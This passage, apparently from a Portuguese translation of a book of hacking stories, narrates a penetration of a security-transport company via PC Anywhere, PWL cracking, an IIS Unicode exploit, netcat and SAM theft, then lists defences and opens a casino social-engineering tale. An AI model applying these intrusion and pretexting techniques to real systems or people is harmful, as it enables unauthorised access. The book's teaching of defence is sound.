detectasse as ferramentas que estavam usando. Entao tentaram usar a capacidade de transferencia de 
documentos no PC Anywhere para transferir o arquivo PWL da maquina do motorista para eles. Nao 
funcionou. "Nao sablamos ao certo por que, mas nao tivemos tempo de sentar para discutir. Tivemos de 
tir ar as informaęoes PWL daquela maquina imediatamente, enquanto o motorista ainda estava on-line." 

O que mais eles poderiam fazer? Urna possibilidade: fazer o upload de urna ferramenta para invadir, 
quebrar o arquivo PWL na maąuina do motorista e extrair as informaęoes num arquivo de texto, e entao 
enviar o arquivo de texto para eles mesmos. Eles tentaram fazer o login para um servidor LTP, para fazer o 
download da ferramenta PWL craking. Mas perceberam urna dificuldade: os mapeamentos do teclado na 
maquina do motorista eram para lingua estrangeira, o que explicaria os problemas que estavam enfrentando 
ao tentarem fazer a autenticaęao. "Continuamos recebendo urna mensagem 'Login incorreto' devido aos 
mapeamentos do teclado estrangeiro." 

As horas passavam. 

Achamos que nosso tempo estava se esgotando. Esse motorista da van de seguranęa poderia 
estar transportando muito dinheiro ou talvez prisioneiros. E devia estar pensando: "Que 
diabos esta acontecendo aqui?'\ Estava com medo de que ele desligasse antes de obtermos o 
que queriamos. 

La estavamos nós, enfrentando urna enorme pressao de tempo, e ninguem na sala tinha urna resposta para 
o problema do teclado estrangeiro. Talvez como urna maneira de contomar a situaęao eles pudessem entrar 
com o nome do usuario e a senha no código ASCII, em vez de letras e numeros. Mas ninguem sabia de 
antemao como entrar com caracteres usando o código ASCII equivalente. 

Entao, o que alguem faz no mundo de hoje quando precisa de urna resposta rapida? Poi o que Louis e 
Brock fizeram: "Optamos por entrar na Internet e pesquisar para encontrar urna maneira de entrar com letras 
sem usar as letras do teclado". 

Eles obtiveram a resposta bem rapido; ativar o teclado Num Lock, entao segurar a tecla <Alt> e digitar o 
numero do caractere ASCII no teclado numerico. O resto era facil: 

Precisayamos traduzir freqiientemente letras e simbolos para o ASCII e vice-versa. Para isso, 
bastaya levantar e olhar uma de nossas tabelas uteis de caracteres especiais do ASCII que 
temos afixadas nas paredes. 

Em vez de figuras sensuais de garotas, esses caras tinham quadros ASCII nas paredes. "ASCII Sexy", 
como Louis os descrevia. 

Enquanto um anotava as pressas algumas informaęoes, outro digitava no teclado e outro lia para ele o 
que digitar, eles entraram com o nome do usuario e a senha. Entao, conseguiram transferir a ferramenta 
cracking PWL e executa-la para extrair a informaęao do arquivo PWL 
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mim arquivo de texto, o que transferiram do laptop do motorista para um servidor FTP sob seu controle. 

Quando Louis examinou o arquivo, encontrou as credenciais de autenticaęao que procurava, inclusive o numero 
dial-up e a informaęao de logon que estava sendo usada pelo motorista quando ele se conectava ao servięo VPN da 
empresa- Aquela, pensou Louis, era a informaęao de que precisava. 

Enquanto limpava tudo para terem certeza de que nao haviam deixado rastros de sua visita, Louis inspecionou os 
icones no desktop e notou um que parecia ser do aplicativo executado para os guardas pegarem informaęoes da 
empresa. Entao souberam que essas maquinas estavam, de fato, se conectando por intermedio da empresa e 
solicitando a um servidor de aplicativo a firn de obter as informaęoes de que os motoristas da area precisavam. 

Acessando o sistema da empresa 

"Estavamos muito conscientes", lembrou Louis, "de que esse usuario agora poderia estar fazendo um relatório da 
atividade estranha observada no computador, por isso pulamos fora. Porque, se esse incidente fosse relatado e o 
servięo VPN fosse desligado, entao nossas credenciais de login nao valeriam nada". 

Alguns segundos mais tarde, eles notaram que sua conexao com o PC Anywhere havia caido — o guarda tinha se 
desconectado. Louis e os demais tinham extraido as informaęoes do arquivo PWL naquele momento critico. 

Louis e Brock agora tinham um numero de telefone e esperavam que fosse um dos dispositivos dial-up que eles 
tinham desenhado em seu diagrama no pub, na noite anterior. Mas, outra vez, era um numero estrangeiro. Usando um 
sistema Windows do mesmo tipo que o guarda tinha usado, eles discaram para a rede da empresa, entraram com o 
nome do usuario e a senha e "descobrimos que tinhamos estabelecido com sucesso urna sessao de VPN", 

Do modo como o VPN era configurado, eles recebiam um endereęo IP virtual dentro da DMZ da empresa, por 
isso estavam atras do primeiro firewall, mas ainda enfrentando o tire wali que guardava a rede interna que haviam 
descoberto anteriormente. 

Esse endereęo IP atribuido pelo VPN estava no intervalo DMZ e provavelmente era considerado confiavel por 
algumas maquinas na rede interna. Louis esperava que peneirar na rede interna seria muito, muito mais facil, urna vez 
que eles tinham passado pelo primeiro firewall. "A essa altura", diz ele, "esperavamos que fosse facil passar pelo 
firewall, para as redes intemas." Mas, quando ele tentou, viu que nao podia entrar diretamente num servięo exploravel 
na maquina que estava executando o servidor do aplicativo. "Havia urna porta TCP muito estranha que podia passar 
pela filtragem, e achamos que era para o aplicativo que os guardas estavam usando. Mas nao sabiamos como ela 
funcionava." 

Louis queria encontrar um sistema na rede interna da empresa em que eles pudessem acessar do endereęo IP que 
tinha sido atribuido. Ele adotou as ' regras comuns de hacker' para tentar encontrar um sistema que pudessem explorar 
na rede interna. 

Esperavam encontrar qualquer sistema dentro da rede que nunca tivesse sido acessivel remota-mente, sabendo 
que provavelmente nao teria recebido um patch contra essas vulnerabilidades, ja que era "mais provavel que seria 
tratado como um sistema apenas para uso interno". Eles usaram um 
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scanner de porta para escanear qualquer servidor Web acessivel (porta 80) por todo o intervalo de endereęo IP da 
rede interna, e descobriram um servidor Windows com o qual podiam se comunicar e que estava executando Internet 
Information Server (IIS), mas urna versao mais antiga do conhecido software servidor — IIS4. Aquela era urna boa 
noticia, porque eles provavelmente encontrariam urna vulnerabilidade sem patch ou um erro de configuraęao que lhes 
daria as chaves do reino. 

A primeira coisa que fizeram foi executar urna ferramenta de detecęao de vulnerabilidades Unicode no servidor 
I1S4 para verificar se ele era vulneravel, e era. (O Unicode e um conjunto de caracteres de 16 bits que codifica 
caracteres de muitas linguas diferentes usando um unico conjunto de caracteres.) "Entao, pudemos usar o exploit 
Unicode para executar comandos naquele servidor Web IIS", aproveitando vulnerabilidades de seguranęa num 
sistema que passava pelo segundo tire wali de filtragem em sua rede interna, "la dentro, no fundo do território 
confiavel, como era", na descrięao de Louis. Os hackers nesse caso criaram urna solicitaęao Web (HTTP) que usava 
esses caracteres especialmente codificados para passar pelas verificaęoes de seguranęa do servidor Web, permitindo- 
lhes executar comandos arbitrarios com os mesmos privilegios que a conta sob a qual o servidor Web estava 
funcionando. 

Impedidos de prosseguir porque nao tinham a capacidade de fazer upload de arquivos, agora viram urna 
oportunidade. Usaram a vulnerabilidade Unicode de executar o comando shell "eco" para fazer o upload de um script 
Active Server Pages (ASP) — um simples transferidor de arquivos que facilitava a transferencia de mais ferramentas 
de hacking a um diretório sob o webroot que estava autorizado a executar scripts do lado do servidor. (O webroot e o 
diretório root do servidor Web, distinto do diretório root de um disco rigido especifico, como C:\.) O comando eco 
simplesmente escreve qualquer argumento passado a ele; o resultado pode ser redirecionado a um arquivo, em vez da 
tela do usuario. Por exemplo, digitando-se "echo owned>mitnick.txf sera escrita a palavra 'ow-ned' no arquivo 
mitnick.txt. Eles usaram urna serie de comandos eco para escrever o código-fonte de um script ASP para um diretório 
executavel no servidor Web. 

Entao, fizeram o upload de outras ferramentas de hacking, inclusive o netcat, urna ferramenta muito usada de 
networking, que e um bom utilitario para instalar um comando shell para a escuta (listening) de urna porta que esta 
entrando. Tambem fizeram o upload de urna ferramenta chamada HK que explorava urna vulnerabilidade na versao 
mais antiga do Windows NT para obter privilegios do administrador de sistema. 

Fizeram o upload de outro script simples para executar o exploit HK e entao usaram o netcat para abrir urna 
conexao shell de volta para si mesmos, habilitando-os a entrar com comandos na maquina-alvo, o que e muito similar 
a ter um 'prompt DOS' nos tempos do sistema operacional DOS. "Tentamos inicializar urna conexao saindo do 
servidor Web interno para nosso computador na DMZ", explicou Louis. "Mas isso nao funcionou, entao tivemos de 
usar urna tecnica chamada 'port barging'." Depois de executar o programa HK para ganhar privilegios, eles 
configuraram o netcat para escutar a porta 80 a firn de 'desviar' o servidor IIS do caminho temporariamente, vigiando 
a primeira conexao que entrasse na porta 80. 

Louis explicou o que e 'desviar': "Em essencia, voce desvia temporariamente o IIS e o tira do caminho, para 
roubar um shell, e permite que o IIS volte ao mesmo tempo que mantem acesso ao seu shell". No ambiente Windows, 
ao contrario dos sistemas operacionais tipo Unix, e permitido ter dois programas usando a mesma porta ao mesmo 
tempo. Um atacante pode tirar vantagem dessa caracteristica encontrando urna porta que nao e filtrada pelo firewall, 
desviando-o para a porta. 
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Foi o que Louis e Brock fizeram. O acesso shell que eles ja tinham no host IIS era limitado aos direitos 
permitidos a conta sob a qual o servidor Web estava funcionando. Entao eles executaram o HK e o netcat, e 
conseguiram ganhar plenos priyilegios de sistema, executando como usuario do sistema, que e o maior 
privilegio no sistema operacional. Usando metodologias-padrao, esse acesso lhes permitiria obter pleno 
controle do ambiente Windows do alvo. 

O servidor estava executando o Windows NT 4.0. Os atacantes queriam ter urna cópia do arquivo 
Security Accounts Manager (SAM), que continha os detalhes das contas de usuario, grupos, politicas e 
controles de acesso. Sob essa versao mais antiga do sistema operacional, eles executaram o comando 'rdisk/s' 
para fazer um disco de reparo de emergencia. Esse programa cria inicialmente varios arquivos em um 
diretório chamado 'reparo'. Entre os arquivos havia urna versao atualizada do arquivo SAM que continha os 
hashes de senha para todas as contas do seryidor* Antes, Louis e Brock recuperaram o arquivo PWL com as 
senhas sigilosas do laptop de um guarda da seguranęa; entao eles extrairam as senhas criptografadas de 
usuarios em um dos servidores da própria empresa. Simplesmente copiaram esse arquivo SAM no webroot 
do servidor Web. "Assim, usando um browser Web, eles o recuperaram do servidor para nossa maquina, de 
volta a nosso escritório." 

Quando eles quebraram as senhas do arquivo SAM, notaram que havia outra conta de administrador na 
maquina local que em diferente da conta de administrador embutida. 

Acho que, depois de algumas horas, conseguimos ąuebrar a senha dessa conta e entao tentamos 
autentica-la ao PDC (Primary Domain Controller — Controlador Primario de Dominio). E 
descobrimos que a conta local que possuia direitos de administrador no servidor Web que 
inyadimos tambem tinha a mesma senha no dominio! A conta tambem tinha direitos de 
administrador de dominio. 

Entao, havia uma conta local de administrador no seryidor Web que tinha o mesmo nome que 
urna conta de administrador de dominio para todo o dominio, e a senha para ambas aquelas 
contas tambem era a mesma. Obviamente, era um administrador preguięoso, e ele tinha aberto 
uma segunda conta com o mesmo nome que a conta de administrador no sistema local, e deu a 
ela a mesma senha. 

Passo a passo. A conta local era simplesmente um administrador no seryidor Web, e nao tinhamos os 
priyilegios de todo o dominio. Mas recuperando a senha naquela conta local do seryidor Web, graęas a um 
administrador preguięoso, descuidado, eles conseguiram comprometer a conta do administrador de dominio. 
A responsabilidade de um administrador de dominio e administrar ou gerenciar um dominio inteiro, o que o 
distingue de um administrador em seu desktop ou laptop local (uma unica maquina). Na opiniao de Louis, 
esse administrador nao era exceęao. 

Essa e uma pratica comum que vemos o tempo todo. Um administrador de dominio cria contas 
locais em sua maquina na rede e usa a mesma senha para suas contas com priyilegios de 
administrador de dominio. isso significa que a seguranęa em cada um daqueles sistemas locais 
pode ser usada para comprometer a seguranęa de todo o dominio. 
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Objetivo atingido 

Chegando mais perto. Louis e Brock viram que agora podiam ganhar pleno controle do servidor de 
aplicativo e dos dados nele contidos. Obtiveram o endereęo IP usado para conectar o servidor de aplicativo a 
partir do laptop do guarda de seguranęa, A partir dai, perceberam que o servidor de aplicativo estava na 
mesma rede, que provavelmente faria parte do mesmo dominio. Finalmente, tinham pleno controle das 
operaęoes de toda a empresa. 

Agora hayiamos atingido o coraęao do negócio. Conseguiamos mudar pedidos naąuele seryidor 

de aplicativo, de modo que podiamos emitir ordens aos guardas como: "Pegue dinheiro desta 

empresa e o entregue neste endereęo", e voce esta esperando la para pegar ąuando eles chegam. 

Ou "Pegue este prisioneiro A, leve-o a este local, entregue-o a custódia dessa pessoa", e voce conseguiu 
tirar o primo de seu melhor amigo da prisao. 

Ou um terrorista. 

Eles tinham nas maos urna ferramenta para ampliar ou criar o caos. "Era chocante, porque eles nao 
enxergavam o que poderia ter acontecido se nao tivessemos chamado a atenęao deles para isso", diz Louis. 

O que a empresa considera 'seguranęa', acredita ele, 'na yerdade e seguranęa suspeita'. 

Insight 

Louis e Brock nao enriqueceram com o poder que eles tinham em suas maos e nao emitiram ordens para 
soltar ou transferir prisioneiros. Em vez disso, fomeceram a empresa um relatório completo do que tinham 
descoberto. 

Ao que parece, a empresa tinha sido seriamente negligente. Eles nao haviam efetuado urna analise de 
risco passo a passo. "Se a primeira maquina fica comprometida, o que um hacker faz a partir desse ponto?" e 
assim por diante. Eles se consideravam seguros porque, com algumas mudanęas na configuraęao, puderam 
corrigir a falha que Louis tinha apontado. A suposięao deles era que nao havia outras falhas, exceto essa que 
Louis e Brock tinham conseguido encontrar e usar. 

Louis considera isso urna arrogancia comum dentro das empresas — urna pessoa de fora nao pode chegar 
e falar sobre seguranęa para eles. O pessoal de TI nao se importa em ser informado sobre algumas coisas que 
precisam ser corrigidas, mas nao aceitam que ninguem venha lhes dizer o que precisam fazer. Eles acham 
que ja sabem. Quando ocorre urna brecha, imaginam que deixaram a peteca cair apenas naquela ocasiao. 

Medidas preventivas 

Como em muitas das histórias neste livro, os atacantes aqui nao encontraram muitas falhas de seguranęa 
em sua empresa-alvo. No entanto, as poucas que encontraram foram suficientes para lhes 
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permitir ter o dominio total dos sistemas de informatica da empresa, que eram essenciais as suas operaęoes, Seguem-se 
algumas lięoes que vale a pena observar. 

Visitas temporarias 

Em algum momento no passado, o dispositivo 3COM tinha sido plugado diretamente numa porta serial do 
roteador Cisco. Embora a pressao para atender a necessidades imediatas possa justificar atalhos temporarios de 
tecnologia, nenhuma empresa pode deixar que o 'temporario' se tome 'para sempre', 

Um esquema deveria ser montado para verificar a configuraęao dos dispositivos gateway por meio de inspeęao 
fisica e lógica ou usando urna ferramenta de seguranęa que monitora continua-mente se qualquer porta aberta 
existente num host ou dispositivo esta de acordo com a politica de seguranęa da empresa, 

Usando portas altas 

A empresa de seguranęa tinha configurado um roteador Cisco para permitir conexoes remotas numa porta alta, 
presumivelmente acreditando que urna porta alta seria obscura o suficiente para ser encontrada por um atacante — 
outra versao da abordagem da 'seguranęa pela obscuridade'. 

Ja tratamos da questao mais de urna vez e falamos sobre a loucura de qualquer decisao de seguranęa baseada 
nessa atitude. As histórias contadas neste livro demonstram repetidamente que, se voce deixa urna unica falha, mais 
cedo ou mais tarde um atacante a encontrara. A melhor pratica de seguranęa e garantir que os pontos de acesso de 
todos os sistemas e dispositivos, obscuros ou nao, sejam filtrados de qualquer rede nao-confiavel. 

Senhas 

Mais urna vez, todas as senhas-padrao para qualquer dispositivo deveriam ser mudadas antes de o sistema ou 
dispositivo ir para a produęao. Mesmo os tecnicos iniciantes sabem desse descuide, comum e como explora-lo. 
(Varios sites na Web, como www.phenoelit.de/dpl/dpl.html fomecem urna lista de nomes de usuarios e senhas- 
padrao.) 

Assegurando laptops pessoais 

Os sistemas usados pelos funcionarios remotos da empresa estavam se conectando a rede corporativa com pouca 
ou nenhuma seguranęa, urna situaęao bastante comum. Um cliente ate tinha o PC Anywhere configurado para 
permitir conexoes remotas — sem exigir sequer urna senha. Embora o computador estivesse se conectando com a 
Internet por discagem e somente por periodos muito limitados de tempo, cada conexao criava urna janela de 
exposięao. Os atacantes conseguiram controlar remotamente a maquina, conectando-se ao laptop que estava 
executando o PC Anywhere. E, urna vez que ele tinha sido configurado sem exigir senha, conseguiram sequestrar o 
desktop do usuario, sabendo apenas seu endereęo IP. 

Aqueles que elaboram politicas de TI deveriam determinar certo nivel de seguranęa para os sis-temas de cliente 
antes de a conexao a rede corporativa ser permitida. Ha produtos disponiveis para instalar agentes nos sistemas de 
cliente que asseguram que os controles de seguranęa estejam em conformidade com a politica da empresa; caso 
contrario, o sistema-cliente tern acesso negado aos recursos de computaęao corporativos. Os espertalhoes vao analisar 
seus alvos examinando o quadro 
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todo. Isso significa tentar identificar se algum usuario se conecta remotamente, e, nesse caso, a origem dessas 
conexoes. O atacante sabe que, se a pessoa pode comprometer um computador confiavel usado para se conectar a 
rede corporativa, e muito provavel que essa relaęao de confianęa possa ser explorada para se ganhar acesso aos 
recursos de informaęao corporativos. 

Mesmo quando a seguranęa esta sendo bem conduzida dentro de uma empresa, ha uma tendencia a ignorar 
laptops e computadores pessoais usados pelos funcionarios para acessar a rede corporativa, ocasionando uma 
abertura da qual os atacantes podem tirar vantagem, como aconteceu nesta historia. Esses laptops e computadores 
que se conectam a rede interna devem ser seguros; caso contrario, podem ser o elo fraco a ser explorado. 

Autenticaęao 

Os atacantes, neste caso, conseguiram extrair informaęoes de autenticaęao do sistema-cliente sem serem 
detectados. Como apontamos repetidas vezes em capitulos anteriores, uma maneira mais forte de autenticaęao vai 
interromper a aęao da maioria dos atacantes, e as empresas deveriam considerar o uso de senhas dinamicas, cartoes 
inteligentes, tokens ou certificados digitais como um meio de autenticaęao para acesso remoto em VPNs ou outros 
sistemas sigilosos. 

Filtrando servięos desnecessarios 

A equipe de TI deveria pensar na criaęao de um conjunto de regras de filtragem para controlar tanto as conexoes 
de entrada quanto as de saida a hosts e servięos especificos de redes nao-confiaveis, como a Internet, assim como de 
redes razoavelmente confiaveis (DMZ) dentro da empresa. 

Reforęando 

A historia deste capitulo tambem traz um lembrete: fala de uma equipe de TI que nao se incomodou em reforęar 
sistemas de computaęao conectados a rede interna ou em se manter atualizada com patches de seguranęa, 
presumivelmente porque achava que o risco de serem comprometidos era bako. Essa pratica comum da uma 
vantagem aos mal-intencionados. Uma vez que o atacante encontra um modo de acessar um unico sistema interno 
sem seguranęa e e capaz de compromete-lo, a porta esta aberta para expandir o acesso ilicito a outros sistemas que 
sao confiaveis pelo computador comprometido. de novo, simplesmente contar com o firewall de perimetro para 
manter os hackers a distancia sem se incomodar em reforęar os sistemas conectados a rede corporativa e o mesmo que 
empilhar toda a sua fortuna em notas de cem dólares em cima da mesa de jantar e imaginar que voce esteja seguro 
porque mantem a porta da frente trancada. 

O resultado 

Como este e o ultimo capitulo sobre histórias que ilustram ataques tecnicos, este parece ser um bom momento 
para rever alguns pontos. 

Se lhe pedissem para citar medidas importantes para se defender das vulnerabilidades mais comuns que permitem 
a entrada dos atacantes com base nas histórias deste livro, quais delas voce escolheria? 

Pense rapido em uma resposta antes de prosseguir com a leitura. Entao, de uma olhada na lista a seguir 
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Independentemente dos itens que voce considera as vulnerabilidades mais comuns descritas neste livro, espero que 
tenha se lembrado de incluir pelo menos alguns destes: 

• Desenvolva um processo para gerenciar patches a firn de assegurar que todas as medidas necessarias de 
seguranęa sejam aplicadas no momento oportuno. 

• Para acesso remoto a informaęoes ou recursos de informatica confidenciais, use metodos mais rigorosos de 
autenticaęao do que aqueles fomecidos por senhas estaticas. 

• Mude todas as senhas-padrao. 

• Use um modelo de defesa profunda, de modo que um unico ponto falho nao afete a seguranęa, e teste 
regularmente esse modelo. 

• Estabeleęa urna politica de seguranęa corporativa com relaęao a filtragem tanto do trafego de entrada 
quanto de saida. 

• Reforce todos os sistemas baseados no cliente que acessam informaęao sigilosa ou recursos de informatica. 
Nao devemos nos esquecer de que o atacante persistente tambem tern como alvo sistemas de clientes para 
sequestrar urna conexao legitima ou explorar um relacionamento confiavel entre o sistema do cliente e a 
rede corporativa, 

• Use dispositivos de detecęao de intrusao para identificar trafego suspeito ou tentativas de explorar 
vulnerabilidades conhecidas. Tais sistemas podem tambem identificar um insider malicioso ou um atacante 
que ja comprometeu o perimetro seguro. 

• Ative recursos de auditoria do sistema operacional e aplicativos criticos. Certifique-se tambem de que os 
logs sejam preservados num host seguro que nao tenha outros servięos e possua o numero minimo de contas 
de usuario, 
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O engenheiro social emprega as mesmas tecnicas persuasivas que usamos no dia-a-dia. 
Assumimos papeis- Tentamos obter credibilidade. Cobramos obrigaęoes reciprocas. Mas o 
engenheiro social aplica essas tecnicas de uma maneira manipuladora, enganosa, altamente 
antietica, freąiientemente com efeito devastador. 

Psicólogo social Dr. Brad Sagarin 


Este capitulo e um pouco diferente: nele examinaremos o tipo mais dificil de ataąue para que possamos 
detecta-lo e nos defender contra ele. O engenheiro social ou o atacante habil que usa a arte de enganar como 
uma das armas de seu kit de ferramentas, procura explorar as melhores qualidades da natureza humana: a 
tendencia natural de ajudar, dar apoio, ser educado, participante de uma equipe e o desejo de realizar um 
trabalho- 

Assim como ocorre com a maioria das coisas que nos ameaęam, o primeiro passo que devemos tomar 
para nos defendermos de modo sensato e entender as metodologias usadas; neste caso, pelos adversarios 
intemautas. Por essa razao, apresentamos aqui um conjunto de criterios psicológicos para investigar os 
fundamentos do comportamento humano e entender por que o engenheiro social e tao influente. 

Primeiro, no entanto, apresentaremos a historia espantosa de um engenheiro social no trabalho, O relato a 
seguir baseia-se numa historia que recebemos por escrito, que, alem de interessante, constitui um bom relato 
de engenharia social. Nós a consideramos tao boa que resolvemos inclui-la, apesar de o fazermos com 
algumas reservas, pois o homem que a contou ou omitiu alguns detalhes 
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porąue se distraiu com outras ąuestoes ou inventou partes dela. Contudo, mesmo que parte da historia seja inventada, 
o caso e bastante convincente, porąue demonstra a necessidade de aperfeięoar a proteęao contra ataąues de 
engenharia social. 

Como nos capitulos anteriores, os detalhes dessa historia tambem foram mudados para proteger tanto o atacante 
ąuanto a empresa-cliente. 

Um engenheiro social em aęao 

No verao de 2002, um consultor de seguranęa cujo codinome e 'Whurley' foi contratado por um grupo de Las 
Vegas para realizar varias auditorias de seguranęa. Eles estavam em pleno processo de reengenharia de sua 
abordagem de seguranęa e o contrataram para "tentar contomar ąualąuer processo", num esforęo que os ajudaria a 
construir urna infra-estrutura mais segura. Ele tinha muita experiencia tecnica, mas pouca experiencia em cassinos. 

Depois de aproximadamente urna semana de pesąuisas sobre a cultura da Strip*, era hora de ir para Las Vegas. 
Ele geralmente comeęava trabalhos como aquele mais cedo e terminava antes da data oficialmente programada para 
comeęar, porąue, após anos de experiencia, havia descoberto que os gerentes nao avisam os funcionarios sobre urna 
auditoria antes da semana em que eles presumem que isso va acontecer. "Embora nao devessem alertar ninguem, eles 
avisam." Mas Whurley contomou facilmente a situaęao fazendo a auditoria duas semanas antes da data programada. 

Embora fossem nove horas da noite ąuando chegou ao seu apartamento no hotel, Whurley foi direto para o 
primeiro cassino de sua lista a firn de comeęar a pesąuisa no local. Como ele nao estava habituado a passar muito 
tempo em cassinos, essa experiencia lhe seria bastante reveladora. A primeira coisa que notou contradisse o que ele 
tinha visto no Travel Channel, no qual todo funcionario de cassino mostrado ou entrevistado parecia ser especialista 
em seguranęa. A maioria dos funcionarios que ele viu no local parecia estar "dormindo em pe ou ser completamente 
negligente com seu trabalho". Essas condięoes os tomariam alvos faceis do mais simples jogo de confianęa — que 
nem chegaria perto do que ele tinha planejado. 

Ele se aproximou de um funcionario bastante tranąuilo e com um pouco de estimulo conseguiu fazer com que ele 
se dispusesse a dar detalhes de seu trabalho. Ironicamente, seu emprego anterior tinha sido no cassino-cliente de 
Whurley, "Entao, aposto que era muito melhor, hein?", Whurley perguntou. 

O funcionario respondeu: "Na verdade, nao. Aqui fazem auditoria no andar o tempo todo. La eles mai notavam se 
eu estava um pouco para tras, e era assim com tudo... relógios de ponto, crachas, horarios, o que fosse. A mao direita 
deles nao sabe o que a esąuerda esta fazendo". 

O homem tambem explicou que perdia seu cracha o tempo todo e as vezes compartilhava um cracha com outro 
funcionario para fazer as refeięoes no refeitório do cassino. 

Na manha seguinte, Whurley estabeleceu seu objetivo, que era bastante direto — entraria em todas as areas 
protegidas do cassino em que conseguisse penetrar, documentaria sua presenęa e tentaria entrar no maximo de 
sistemas de seguranęa possivel. Alem disso, ąueria descobrir se conseguiria 


O centro de Las Yegas e conhecido mundialmente como Las Yegas Strip (N. da R.T.). 
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acessar algum dos sistemas que lidavam com dados financeiros ou que contivessem outras informaęoes sigilosas, 
como informaęoes a respeito de visitantes. 

Naquela noite, no caminho de volta ao hotel, depois de visitar o cassino-alvo, ele ouviu no radio o anuncio de 
urna promoęao de urna academia, urna oferta especial para fimcionarios do setor de servięos. Depois de dormir um 
pouco, foi ate o local na manha seguinte. 

La, escolheu como alvo urna senhora chamada Lenore. "Em 15 minutos estabelecemos urna ligaęao espiritual'." 
Isso foi excelente, porque Lenore era auditora financeira e ele queria obter o maximo de informaęoes relacionadas 
com as palavras 'financeiro' e 'auditoria' no cassino-alvo. Se conseguisse penetrar nos sistemas financeiros quando 
fizesse sua auditoria, certamente o cliente consideraria isso uma imensa talha de seguranęa. 

Urna das estrategias preferidas de Whurley em engenharia social e a 'leitura de sinais nao-verbais. Enquanto 
conversavam, ele observou os sinais nao-verbais de Lenore e entao disse alguma coisa que a levou a responder "Ah, 
nao diga; eu tambem!". Os dois se deram bem e ele a convidou para jantar 

No jantar. Whurley disse-lhe que era novo em Vegas e estava procurando emprego, que tinha cursado uma 
universidade renomada e era diplomado na area financeira. Contou tambem que tinha se mudado para Vegas depois 
de romper com a namorada — a mudanęa de ritmo o ajudaria a superar isso. Entao, ele confessou que se sentia um 
pouco intimidado em procurar emprego na area de auditoria em Vegas, porque nao queria acabar 'nadando com os 
tubaroes*. Lenore passou as horas seguintes assegurando que ele nao teria dificuldade em obter um emprego na area 
financeira. Para ajuda-lo, deu-lhe mais detalhes sobre seu emprego e seu empregador do que ele precisava. "Ela foi a 
melhor coisa que podia ter me acontecido naquela empreitada ate entao. Paguei o jantar de bom grado — iria inclui-lo 
nas despesas, de qualquer modo." 

Relembrando o que aconteceu, ele confessou que naquele ponto estava bastante seguro quanto a suas habilidades, 
"que mais tarde viriam a me custar caro". Era hora de comeęar. Ele juntou "alguns bens, inclusive meu laptop, um 
gateway sem fio de banda larga, uma antena e outros acessórios". O objetivo era simples: tentar entrar no escritório do 
cassino, tirar algumas fotos digitais (com o horario impresso) de si mesmo em lugares onde nao deveria estar e entao 
instalar na rede um ponto de acesso sem fio, de modo que pudesse tentar entrar nos sistemas remotamente para reunir 
informaęoes sigilosas. Para fmalizar o trabalho, teria de voltar no dia seguinte para pegar o ponto de acesso. 

"Eu estava me sentindo o próprio James Bond." Whurley chegou a entrada de fimcionarios do cassino bem no 
horario da troca de tumo e se posicionou de maneira a conseguir observar a porta. Ele achou que teria tempo de 
observar o movimento durante alguns minutos, mas aparentemente a maioria das pessoas ja havia chegado. Enquanto 
isso, ele estava la parado, tentando entrar sozinho. 

Depois de alguns minutos, a entrada ficou vazia... mas nao era o que ele queria. Whurley notou que um guarda 
estava indo embora, mas foi parado por outro, e os dois ficaram por la, fumando do lado de fora. Quando terminaram, 
se despediram e caminharam em direęoes opostas. 

Atravessei a rua na direęao do guarda que estava saindo do edificio e me preparei para fazer minha 

pergunta fayorita, que desarma qualquer um. Ele atrayessou a rua e deixei-o passar por mim. 



A arte de iiwadir 


Entao disse: "Que horas sao, por favor?" 

Era exatamente o que ąueria. "Uma coisa que notei e que se voce se aproxima de alguem pela ffente, a 
pessoa quase sempre e mais defensiva do que se voce a deixar passar antes de se dirigir a ela." Enquanto o 
guarda lhe dava a informaęao, Whurley o examinava detalhadamente. Um cracha identificava o guarda como 
Charlie. "Nesse meio tempo, tive sorte. Outro funcionario estava saindo e chamou Charlie de Cheesy, seu 
apelido. Entao perguntei a Charlie como lhe arranjaram aquela droga de apelido e ele me contou." 

Em seguida, Whurley se dirigiu para a entrada de funcionarios a passos rapidos. Freqiientemente se diz 
que a melhor defesa e o ataque, e aquele era seu piano. Quando chegou a porta, onde, como ja havia notado, 
os funcionarios mostravam seus crachas, foi direto ao guarda na recepęao e disse: "Oi, voce viu o Cheesy? 
Ele me deve 20 dólares do jogo e eu preciso do dinheiro para almoęar". 

Ao lembrar-se do episódio, ele diz: "Droga! Foi ali que enffentei meu primeiro desafio". Ele tinha se 
esquecido de que os funcionarios faziam suas refeięoes gratuitamente. Contudo, o desafio nao o 
desencorajou. Enquanto para outras pessoas com deficit de atenęao/disturbio de hiperatividade (TDA) aquilo 
poderia ser um problema. Whurley se descreve com "muito TOA" e acrescenta que "posso pensar muito mais 
rapido que 90 por cento das pessoas que conheęo". Essa habilidade veio a calhar naquele momento. 

Entao, o guarda disse: M E o que voce esta pensando em comprar para almoęar?". E riu, mas 
comeęou a parecer desconfiado. Eu fui rapido: "Vou almoęar com uma garota. Cara. ela e 
sexy". (Isso sempre distrai os caras mais velhos, os que estao fora de forma e aqueles que vivem 
com a mae.) "O que eu vou fazer?" O guarda disse: "Bem, voce esta ferrado, porque Cheesy 
nao vai trabalhar o resto da semana". "Calhorda!", eu disse. 

Whurley achou muito engraęado (mas nem ousou demonstrar isso) quando inesperadamente o guarda lhe 
perguntou se ele estava apaixonado. 

Comecei a enrolar. Entao tive a maior surpresa da minha vida. Nada semelhante tinha 
acontecido ate entao. Podia ser atribuida a habilidade, mas eu atribui a uma sorte inesperada: o 
cara me deu 40 dólares! Ele me disse que 20 dólares nao iam comprar droga nenhuma e eu 
obviamente precisaria pagar a conta. Entao ele me concedeu cinco minutos de conselho 
'paternal' e disse tudo o que ele ja gostaria de saber quando tinha minha idade. 

Whurley ficou espantado, porque o cara tinha caido no conto-do-vigario e estava fmanciando seu 
encontro imaginario. 

Mas as coisas nao seriam tao tranquilas quanto Whurley imaginava: assim que ele se distanciou, o guarda 
se deu conta de que ele nao tinha mostrado nenhum cracha e o questionou. "Entao eu disse: 'Nao esta no meu 
bolso, me desculpe', e comecei a procurar nas minhas coisas e a me afastar dele- Ele quase me pegou. Se 
tivesse insistido em ver meu cracha, eu estaria em maus lenęóis." 
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Whurley havia ultrapassado a entrada de funcionarios, mas nao tinha ideia do local para onde iria. Nao 
podia seguir outras pessoas, entao simplesmente comeęou a andar de cabeęa erguida e a memorizar os locais 
por onde passava. Ele sentiu certo medo de ser interpelado naąuela altura. "E engraęado", disse Whurley, 
"como a psicologia da cor pode ser util. Eu estava usando azul — a cor da verdade — e vestido como se 
